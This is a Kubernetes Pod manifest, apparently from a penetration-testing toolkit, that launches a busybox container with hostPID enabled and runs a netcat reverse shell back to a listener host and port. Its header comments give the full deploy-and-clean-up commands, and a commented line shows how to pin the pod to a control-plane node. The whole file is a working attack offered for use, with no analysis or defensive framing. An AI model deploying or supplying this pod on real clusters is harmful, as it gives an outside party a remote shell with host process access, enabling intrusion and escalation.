###########################################################
## Set up Listener: nc -nvlp [PORT]
## Deploy: HOST="10.0.0.1" PORT="3116" envsubst < pod-hostpid-revshell.yaml | kubectl apply -f -
## Remove: kubectl -n [namespace] delete pod-hostpid
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostpid-revshell
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    imagePullPolicy: IfNotPresent
    name: hostpid-revshell
    #nodeName: k8s-control-plane-node # Force your pod to run on a control-plane node by uncommenting this line and changing to a control-plane node name
    restartPolicy: Always